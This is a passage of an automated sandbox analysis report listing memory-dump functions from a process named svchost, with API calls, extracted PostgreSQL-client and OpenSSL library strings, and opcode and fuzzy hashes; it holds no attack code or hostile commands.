                                                                                            • Source File: 0000002A.00000002.3451764609.00007FFDA36D1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFDA36D0000, based on PE: true
                                                                                            • Associated: 0000002A.00000002.3451740549.00007FFDA36D0000.00000002.00000001.01000000.0000000D.sdmp
                                                                                            • Associated: 0000002A.00000002.3451805412.00007FFDA36F8000.00000002.00000001.01000000.0000000D.sdmp
                                                                                            • Associated: 0000002A.00000002.3451839464.00007FFDA371E000.00000004.00000001.01000000.0000000D.sdmp
                                                                                            • Associated: 0000002A.00000002.3451862794.00007FFDA371F000.00000002.00000001.01000000.0000000D.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_42_2_7ffda36d0000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID: free$_errno$libintl_dgettextmallocstrcmp
                                                                                            • String ID: could not encrypt password: %s$md5$n$o$off$out of memory$password_encryption value too long$scram-sha-256$show password_encryption$unexpected shape of result set returned for SHOW$unrecognized password encryption algorithm "%s"
                                                                                            • API String ID: 2669966460-1542938121
                                                                                            • Opcode ID: 685abae318517cc38282907127db721522e3de23cf5f7e373fbeafdd212f7d86
                                                                                            • Instruction ID: 933a1f37569deac1f0ef9ce73e15ad8c39db7b995baffc49c6f13250cb5f4578
                                                                                            • Opcode Fuzzy Hash: 685abae318517cc38282907127db721522e3de23cf5f7e373fbeafdd212f7d86
                                                                                            • Instruction Fuzzy Hash: 7961B452B1FF8645FE94AB25A8303B96792AF45BC4F4C7031DA4E667C7DE2EE0458308
                                                                                            APIs
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000002A.00000002.3448016000.0000000066001000.00000020.00000001.01000000.00000013.sdmp, Offset: 66000000, based on PE: true
                                                                                            • Associated: 0000002A.00000002.3447969945.0000000066000000.00000002.00000001.01000000.00000013.sdmp
                                                                                            • Associated: 0000002A.00000002.3448075798.000000006601E000.00000002.00000001.01000000.00000013.sdmp
                                                                                            • Associated: 0000002A.00000002.3448241150.00000000660EF000.00000004.00000001.01000000.00000013.sdmp
                                                                                            • Associated: 0000002A.00000002.3448283516.00000000660F0000.00000002.00000001.01000000.00000013.sdmp
                                                                                            • Associated: 0000002A.00000002.3448334850.00000000660F1000.00000004.00000001.01000000.00000013.sdmp
                                                                                            • Associated: 0000002A.00000002.3448369571.00000000660F4000.00000008.00000001.01000000.00000013.sdmp
                                                                                            • Associated: 0000002A.00000002.3448405346.00000000660F5000.00000002.00000001.01000000.00000013.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_42_2_66000000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID: abort
                                                                                            • String ID: ~
                                                                                            • API String ID: 4206212132-1707062198
                                                                                            • Opcode ID: 21f2b6e04ff2266948ea64f7cb8e1876e9d0e051aa6a3bbe4280e8069c0cad89
                                                                                            • Instruction ID: 3555c39b979745ede8dc66afa62e793a1e2333b2dd720fc6b1321b8c210b37bb
                                                                                            • Opcode Fuzzy Hash: 21f2b6e04ff2266948ea64f7cb8e1876e9d0e051aa6a3bbe4280e8069c0cad89
                                                                                            • Instruction Fuzzy Hash: CD414A22B1C1C08AD32287F9985074EFE91936779CF444773EDA84B3D5C5ADC945D352
                                                                                            APIs
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000002A.00000002.3451764609.00007FFDA36D1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFDA36D0000, based on PE: true
                                                                                            • Associated: 0000002A.00000002.3451740549.00007FFDA36D0000.00000002.00000001.01000000.0000000D.sdmp
                                                                                            • Associated: 0000002A.00000002.3451805412.00007FFDA36F8000.00000002.00000001.01000000.0000000D.sdmp
                                                                                            • Associated: 0000002A.00000002.3451839464.00007FFDA371E000.00000004.00000001.01000000.0000000D.sdmp
                                                                                            • Associated: 0000002A.00000002.3451862794.00007FFDA371F000.00000002.00000001.01000000.0000000D.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_42_2_7ffda36d0000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID: _errno$ErrorLast$free
                                                                                            • String ID: could not get peer credentials: %s$could not send SSL negotiation packet: %s$could not send startup packet: %s$out of memory$requirepeer parameter is not supported on this platform
                                                                                            • API String ID: 639846730-1707911190
                                                                                            • Opcode ID: d041343bb5531454f65594fc02db2f4c14d9a5ac42e32eb2781c947c34864a32
                                                                                            • Instruction ID: 1f72f7dbdc8b915d2aaa5a7f474fec5f728328b0851fcf683e42847daf1a2970
                                                                                            • Opcode Fuzzy Hash: d041343bb5531454f65594fc02db2f4c14d9a5ac42e32eb2781c947c34864a32
                                                                                            • Instruction Fuzzy Hash: 22519062B0AA8281FB569B21D4252F82363AF457C4F4C6031CE0D2779BDE7EE945C318
                                                                                            APIs
                                                                                            • _strdup.API-MS-WIN-CRT-STRING-L1-1-0(require,?,?,00007FFDA36D7C74), ref: 00007FFDA36F49DA
                                                                                            • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FFDA36F49FD
                                                                                            • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FFDA36F4A31
                                                                                            • libintl_gettext.LIBINTL-9(require,?,?,00007FFDA36D7C74), ref: 00007FFDA36F4AE4
                                                                                            • __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(require,?,?,00007FFDA36D7C74), ref: 00007FFDA36F4AF1
                                                                                            • __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00007FFDA36F4B0D
                                                                                            • fputc.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00007FFDA36F4B1B
                                                                                            • free.API-MS-WIN-CRT-HEAP-L1-1-0(require,?,?,00007FFDA36D7C74), ref: 00007FFDA36F4B24
                                                                                              • Part of subcall function 00007FFDA36F39E0: isupper.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FFDA36F3A33
                                                                                              • Part of subcall function 00007FFDA36F39E0: tolower.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FFDA36F3A3F
                                                                                              • Part of subcall function 00007FFDA36F39E0: isupper.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FFDA36F3A5B
                                                                                              • Part of subcall function 00007FFDA36F39E0: tolower.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FFDA36F3A67
                                                                                              • Part of subcall function 00007FFDA36F5F50: setlocale.API-MS-WIN-CRT-LOCALE-L1-1-0(?,?,00000000,00007FFDA36F4A43,require,?,?,00007FFDA36D7C74), ref: 00007FFDA36F5F72
                                                                                            • free.API-MS-WIN-CRT-HEAP-L1-1-0(require,?,?,00007FFDA36D7C74), ref: 00007FFDA36F4B4A
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000002A.00000002.3451764609.00007FFDA36D1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFDA36D0000, based on PE: true
                                                                                            • Associated: 0000002A.00000002.3451740549.00007FFDA36D0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451805412.00007FFDA36F8000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451839464.00007FFDA371E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451862794.00007FFDA371F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_42_2_7ffda36d0000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID: free$__acrt_iob_funcisuppertolower$_strdupfputclibintl_gettextsetlocale
                                                                                            • String ID: POSIX$could not determine encoding for locale "%s": codeset is "%s"$require
                                                                                            • API String ID: 1541619466-2821463991
                                                                                            • Opcode ID: 2d925876269e9c979c64e30d574db976658d2537e890b25a58763149c12f48b0
                                                                                            • Instruction ID: 8568252037fea7d3c7270245b4b9f35589e116962e99246334cd7db198f5da05
                                                                                            • Opcode Fuzzy Hash: 2d925876269e9c979c64e30d574db976658d2537e890b25a58763149c12f48b0
                                                                                            • Instruction Fuzzy Hash: CA417111B0B70241F955975AA53627963A3AF44BD0F0C6134DE0D677DBEE7EE8418308
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000002A.00000002.3448016000.0000000066001000.00000020.00000001.01000000.00000013.sdmp, Offset: 66000000, based on PE: true
                                                                                            • Associated: 0000002A.00000002.3447969945.0000000066000000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3448075798.000000006601E000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3448241150.00000000660EF000.00000004.00000001.01000000.00000013.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3448283516.00000000660F0000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3448334850.00000000660F1000.00000004.00000001.01000000.00000013.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3448369571.00000000660F4000.00000008.00000001.01000000.00000013.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3448405346.00000000660F5000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_42_2_66000000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: c1cee5af0043d3d14253abd7487f399c56c7ec4a189c54a7ab216a6dd0e2c10d
                                                                                            • Instruction ID: 83e2f48b8e17a9ea3244f8c933bd013bedba2ac0acae0438283bec6c705ba1b9
                                                                                            • Opcode Fuzzy Hash: c1cee5af0043d3d14253abd7487f399c56c7ec4a189c54a7ab216a6dd0e2c10d
                                                                                            • Instruction Fuzzy Hash: 533133B690D1929AD7296BF8C81279DFF518B5F398FC00733DA18822D5C39ACE49CB41
                                                                                            APIs
                                                                                              • Part of subcall function 00007FFDA36ECBA0: malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FFDA36ECBB1
                                                                                              • Part of subcall function 00007FFDA36ECBA0: free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FFDA36ECBEE
                                                                                            • malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FFDA36EDADD
                                                                                            • libintl_gettext.LIBINTL-9 ref: 00007FFDA36EDAF2
                                                                                            • libintl_gettext.LIBINTL-9 ref: 00007FFDA36EDB34
                                                                                            • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FFDA36EDB3F
                                                                                              • Part of subcall function 00007FFDA36ECD20: ERR_get_error.LIBCRYPTO-3-X64 ref: 00007FFDA36ECD3A
                                                                                              • Part of subcall function 00007FFDA36ECE50: free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FFDA36ECE75
                                                                                              • Part of subcall function 00007FFDA36F1420: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FFDA36ED9C9), ref: 00007FFDA36F1431
                                                                                              • Part of subcall function 00007FFDA36F1420: ERR_clear_error.LIBCRYPTO-3-X64(?,?,?,00007FFDA36ED9C9), ref: 00007FFDA36F144E
                                                                                              • Part of subcall function 00007FFDA36F1420: free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FFDA36ED9C9), ref: 00007FFDA36F146F
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000002A.00000002.3451764609.00007FFDA36D1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFDA36D0000, based on PE: true
                                                                                            • Associated: 0000002A.00000002.3451740549.00007FFDA36D0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451805412.00007FFDA36F8000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451839464.00007FFDA371E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451862794.00007FFDA371F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_42_2_7ffda36d0000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID: free$malloc$libintl_gettext$R_clear_errorR_get_error
                                                                                            • String ID: Client Key$SCRAM-SHA-256$%d:$Server Key$could not encode salt$could not encode server key$could not encode stored key$out of memory
                                                                                            • API String ID: 655043350-359433055
                                                                                            • Opcode ID: 19bf4ac48cda482676f6703b34b197612e28e43830431e458c3bf9adbb1ee1af
                                                                                            • Instruction ID: 06e855d295dfd39e4222a23e1cf63252d07c734517f635a0a34fdd1c15d06f5e
                                                                                            • Opcode Fuzzy Hash: 19bf4ac48cda482676f6703b34b197612e28e43830431e458c3bf9adbb1ee1af
                                                                                            • Instruction Fuzzy Hash: EF816561B0F78345FA149B25A8313BA6662AF85BC4F1C6035DE4E67787FE3EE0098704
                                                                                            APIs
                                                                                            • fputs.API-MS-WIN-CRT-STDIO-L1-1-0(?,?,?,00000000,?,00000000,00000000,00007FFDA36E3A23), ref: 00007FFDA36E4581
                                                                                            • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00000000,?,00000000,00000000,00007FFDA36E3A23), ref: 00007FFDA36E45AF
                                                                                            • __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(?,?,?,00000000,?,00000000,00000000,00007FFDA36E3A23), ref: 00007FFDA36E45EC
                                                                                            • fputs.API-MS-WIN-CRT-STDIO-L1-1-0(?,?,?,00000000,?,00000000,00000000,00007FFDA36E3A23), ref: 00007FFDA36E46E3
                                                                                            • fputc.API-MS-WIN-CRT-STDIO-L1-1-0(?,?,?,00000000,?,00000000,00000000,00007FFDA36E3A23), ref: 00007FFDA36E46F0
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000002A.00000002.3451764609.00007FFDA36D1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFDA36D0000, based on PE: true
                                                                                            • Associated: 0000002A.00000002.3451740549.00007FFDA36D0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451805412.00007FFDA36F8000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451839464.00007FFDA371E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451862794.00007FFDA371F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_42_2_7ffda36d0000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID: fputs$__acrt_iob_funcfputcmalloc
                                                                                            • String ID: %-*s%s %s$%s%s%s$<tr><td align="left"><b>%s</b></td><td align="%s">%s</td></tr>$left$out of memory$right
                                                                                            • API String ID: 1597415195-1811498410
                                                                                            • Opcode ID: f022fe8691054bc17b551666707fe958c3d117a72318908ac244b4d7d5f19cbc
                                                                                            • Instruction ID: cb73c9196fcdae98ac51050c4908022689bbb15f7a056ddc8747a016921ad3f0
                                                                                            • Opcode Fuzzy Hash: f022fe8691054bc17b551666707fe958c3d117a72318908ac244b4d7d5f19cbc
                                                                                            • Instruction Fuzzy Hash: 0E71E461B0E6C28AFB21CF21E4253B967A2BB45B84F186031CA9D17797CF3EE4598704
                                                                                            APIs
                                                                                              • Part of subcall function 00007FFDA36F32E0: GetSystemTimePreciseAsFileTime.KERNEL32(?,?,?,00007FFDA36EA4F7), ref: 00007FFDA36F32EE
                                                                                            • _localtime64.API-MS-WIN-CRT-TIME-L1-1-0 ref: 00007FFDA36EA506
                                                                                            • strftime.API-MS-WIN-CRT-TIME-L1-1-0 ref: 00007FFDA36EA521
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000002A.00000002.3451764609.00007FFDA36D1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFDA36D0000, based on PE: true
                                                                                            • Associated: 0000002A.00000002.3451740549.00007FFDA36D0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451805412.00007FFDA36F8000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451839464.00007FFDA371E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451862794.00007FFDA371F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_42_2_7ffda36d0000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID: Time$FilePreciseSystem_localtime64strftime
                                                                                            • String ID: %Y-%m-%d %H:%M:%S$%s$%s%d$%sNN$.%06u$Unknown message: %02x$mismatched message length: consumed %d, expected %d$show password_encryption
                                                                                            • API String ID: 2854911984-3289041829
                                                                                            • Opcode ID: a90116a8806ecc0ffbfeb71d5302aa1359399c38876b2c9f3cb524ba02670efc
                                                                                            • Instruction ID: 4e448a0df506a1a2958f53d2381149fe8cc0ed42337d4da601b60046bb5ac396
                                                                                            • Opcode Fuzzy Hash: a90116a8806ecc0ffbfeb71d5302aa1359399c38876b2c9f3cb524ba02670efc
                                                                                            • Instruction Fuzzy Hash: D951B372B1AA4685FB10CB65E4606FD3362BB44798F482131EE0E23796CE3EE549C744
                                                                                            APIs
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000002A.00000002.3451764609.00007FFDA36D1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFDA36D0000, based on PE: true
                                                                                            • Associated: 0000002A.00000002.3451740549.00007FFDA36D0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451805412.00007FFDA36F8000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451839464.00007FFDA371E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451862794.00007FFDA371F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_42_2_7ffda36d0000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID: L_get_current_cipherstrcmp
                                                                                            • String ID: OpenSSL$cipher$compression$key_bits$library$off$protocol
                                                                                            • API String ID: 2744129671-2628787255
                                                                                            • Opcode ID: 92fcdf36734d0fb205aec8255bc14b7d24d506ab4030cabfb562e94bc9658323
                                                                                            • Instruction ID: 028934ae97fdf55048f1f476cd0788f551a9e625e42d5667249b498f2990784f
                                                                                            • Opcode Fuzzy Hash: 92fcdf36734d0fb205aec8255bc14b7d24d506ab4030cabfb562e94bc9658323
                                                                                            • Instruction Fuzzy Hash: A0418512B1F68281FA458B05E5701B92362EB85BD0F5C3031DA5E2775BEF2EE996C708
                                                                                            APIs
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000002A.00000002.3451764609.00007FFDA36D1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFDA36D0000, based on PE: true
                                                                                            • Associated: 0000002A.00000002.3451740549.00007FFDA36D0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451805412.00007FFDA36F8000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451839464.00007FFDA371E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451862794.00007FFDA371F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_42_2_7ffda36d0000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID: free$ContextCredentialsDeleteFreeHandleSecurityclosesocket
                                                                                            • String ID: show password_encryption
                                                                                            • API String ID: 1081927107-3405507779
                                                                                            • Opcode ID: 8946289a09cbcf4c43a48a737afeed1ce7ae3a0011d1cbfb3534ccd00b22f732
                                                                                            • Instruction ID: 7534bf109de66570f3706a5f96c0780e9954e15821344235b119d9a7ac8179ee
                                                                                            • Opcode Fuzzy Hash: 8946289a09cbcf4c43a48a737afeed1ce7ae3a0011d1cbfb3534ccd00b22f732
                                                                                            • Instruction Fuzzy Hash: 64415D32B06B8192EA5D8F61E5602A9B360FB44FA0F4C5235CB6D27795CF39F4B58318
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000002A.00000002.3451764609.00007FFDA36D1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFDA36D0000, based on PE: true
                                                                                            • Associated: 0000002A.00000002.3451740549.00007FFDA36D0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451805412.00007FFDA36F8000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451839464.00007FFDA371E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451862794.00007FFDA371F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_42_2_7ffda36d0000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: unexpected asyncStatus: %d$write to server failed
                                                                                            • API String ID: 0-2101341316
                                                                                            • Opcode ID: 2c45744ce1d0bba16ea52ea20248616da895c28e2d6741c572a82e80f7e09679
                                                                                            • Instruction ID: 6862a59be22cfb931e09764b47e761f4a403c1d031e86fe01a5b331f6d7baa8c
                                                                                            • Opcode Fuzzy Hash: 2c45744ce1d0bba16ea52ea20248616da895c28e2d6741c572a82e80f7e09679
                                                                                            • Instruction Fuzzy Hash: C8B15932B1AB8292F758DF2595202A9776AFB45F84F4C2032DE0D9779ACF3AE154C314
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000002A.00000002.3451563505.00007FFDA3601000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FFDA3600000, based on PE: true
                                                                                            • Associated: 0000002A.00000002.3451531136.00007FFDA3600000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451655757.00007FFDA3690000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451689034.00007FFDA36BD000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451714646.00007FFDA36C1000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_42_2_7ffda3600000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID: L_sk_freeL_sk_num$L_sk_dupL_sk_value$L_sk_set_cmp_funcL_sk_unshift
                                                                                            • String ID:
                                                                                            • API String ID: 621534355-0
                                                                                            • Opcode ID: f0d08f9c44626d6a420e869fc49c6193ca44d7cac564c57ad9a3cf6818c0e48e
                                                                                            • Instruction ID: 29ef5065200cd70251a0d753e3666247da96bcc6054e92811e03cdb31e0c17e9
                                                                                            • Opcode Fuzzy Hash: f0d08f9c44626d6a420e869fc49c6193ca44d7cac564c57ad9a3cf6818c0e48e
                                                                                            • Instruction Fuzzy Hash: F8318121B0A74246FA54EB26A43117967A3AF89BC0F0D6074EE4E57797EE3EE4108708
                                                                                            APIs
                                                                                            • feof.API-MS-WIN-CRT-STDIO-L1-1-0(?,?,?,?,?,?,?,?,?,?,00000000,?,?,00000000,00000000,00007FFDA36D7176), ref: 00007FFDA36DAAC0
                                                                                            • ferror.API-MS-WIN-CRT-STDIO-L1-1-0(?,?,?,?,?,?,?,?,?,?,00000000,?,?,00000000,00000000,00007FFDA36D7176), ref: 00007FFDA36DAAD4
                                                                                            • fgets.API-MS-WIN-CRT-STDIO-L1-1-0(?,?,?,?,?,?,?,?,?,?,00000000,?,?,00000000,00000000,00007FFDA36D7176), ref: 00007FFDA36DAB0C
                                                                                            • feof.API-MS-WIN-CRT-STDIO-L1-1-0(?,?,?,?,?,?,?,?,?,?,00000000,?,?,00000000,00000000,00007FFDA36D7176), ref: 00007FFDA36DAB53
                                                                                              • Part of subcall function 00007FFDA36D9780: isalpha.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,00007FFDA36DAA61,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FFDA36D9796
                                                                                            • feof.API-MS-WIN-CRT-STDIO-L1-1-0(?,?,?,?,?,?,?,?,?,?,00000000,?,?,00000000,00000000,00007FFDA36D7176), ref: 00007FFDA36DAD76
                                                                                            • fclose.API-MS-WIN-CRT-STDIO-L1-1-0(?,?,?,?,?,?,?,?,?,?,00000000,?,?,00000000,00000000,00007FFDA36D7176), ref: 00007FFDA36DAD87
                                                                                            • _strdup.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,?,?,?,?,?,?,00000000,?,?,00000000,00000000,00007FFDA36D7176), ref: 00007FFDA36DADD4
                                                                                            • fclose.API-MS-WIN-CRT-STDIO-L1-1-0(?,?,?,?,?,?,?,?,?,?,00000000,?,?,00000000,00000000,00007FFDA36D7176), ref: 00007FFDA36DADE0
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000002A.00000002.3451764609.00007FFDA36D1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFDA36D0000, based on PE: true
                                                                                            • Associated: 0000002A.00000002.3451740549.00007FFDA36D0000.00000002.00000001.01000000.0000000D.sdmp
                                                                                            • Associated: 0000002A.00000002.3451805412.00007FFDA36F8000.00000002.00000001.01000000.0000000D.sdmp
                                                                                            • Associated: 0000002A.00000002.3451839464.00007FFDA371E000.00000004.00000001.01000000.0000000D.sdmp
                                                                                            • Associated: 0000002A.00000002.3451862794.00007FFDA371F000.00000002.00000001.01000000.0000000D.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_42_2_7ffda36d0000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID: feof$fclose$_strdupferrorfgetsisalpha
                                                                                            • String ID: 5432$localhost
                                                                                            • API String ID: 1798642821-348290473
                                                                                            • Opcode ID: 092c9de2007eeb9836d3b051d1b577110671f93ea9359ed8fa820306e8131927
                                                                                            • Instruction ID: 909f8cae6e15703e6c69f7e17bd04eef9364a54a705a9ccdb700e7242c08c756
                                                                                            • Opcode Fuzzy Hash: 092c9de2007eeb9836d3b051d1b577110671f93ea9359ed8fa820306e8131927
                                                                                            • Instruction Fuzzy Hash: 15D18E13B0EA8A46FFB18E24D4702B927939F56BD5F4C6031D98D2239BDE2FD905C218
                                                                                            APIs
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000002A.00000002.3451764609.00007FFDA36D1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFDA36D0000, based on PE: true
                                                                                            • Associated: 0000002A.00000002.3451740549.00007FFDA36D0000.00000002.00000001.01000000.0000000D.sdmp
                                                                                            • Associated: 0000002A.00000002.3451805412.00007FFDA36F8000.00000002.00000001.01000000.0000000D.sdmp
                                                                                            • Associated: 0000002A.00000002.3451839464.00007FFDA371E000.00000004.00000001.01000000.0000000D.sdmp
                                                                                            • Associated: 0000002A.00000002.3451862794.00007FFDA371F000.00000002.00000001.01000000.0000000D.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_42_2_7ffda36d0000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID: free$malloc$_strdup
                                                                                            • String ID: ...$LINE %d:
                                                                                            • API String ID: 1496848336-1733386033
                                                                                            • Opcode ID: 855007ee717508a0b981155fd2d9850b5b40592a03014f71656aa87bf42d2411
                                                                                            • Instruction ID: b64076e987cac621fdb93dabe35ee0baf9366952a916b7ab0030888b99b9ea70
                                                                                            • Opcode Fuzzy Hash: 855007ee717508a0b981155fd2d9850b5b40592a03014f71656aa87bf42d2411
                                                                                            • Instruction Fuzzy Hash: 6DC1D736B0A68286FB608F19A1603BA7792FB45784F286131DA4D57756DF3EE409CB08
                                                                                            APIs
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000002A.00000002.3448016000.0000000066001000.00000020.00000001.01000000.00000013.sdmp, Offset: 66000000, based on PE: true
                                                                                            • Associated: 0000002A.00000002.3447969945.0000000066000000.00000002.00000001.01000000.00000013.sdmp
                                                                                            • Associated: 0000002A.00000002.3448075798.000000006601E000.00000002.00000001.01000000.00000013.sdmp
                                                                                            • Associated: 0000002A.00000002.3448241150.00000000660EF000.00000004.00000001.01000000.00000013.sdmp
                                                                                            • Associated: 0000002A.00000002.3448283516.00000000660F0000.00000002.00000001.01000000.00000013.sdmp
                                                                                            • Associated: 0000002A.00000002.3448334850.00000000660F1000.00000004.00000001.01000000.00000013.sdmp
                                                                                            • Associated: 0000002A.00000002.3448369571.00000000660F4000.00000008.00000001.01000000.00000013.sdmp
                                                                                            • Associated: 0000002A.00000002.3448405346.00000000660F5000.00000002.00000001.01000000.00000013.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_42_2_66000000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID: _errno
                                                                                            • String ID: //IGNORE$//IGNORE$//TRANSL$//TRANSL$CP437
                                                                                            • API String ID: 2918714741-2468171555
                                                                                            • Opcode ID: 28837276f4f25ef3f45700059dea778a19c2f9cf2792603be5c1e69070d17263
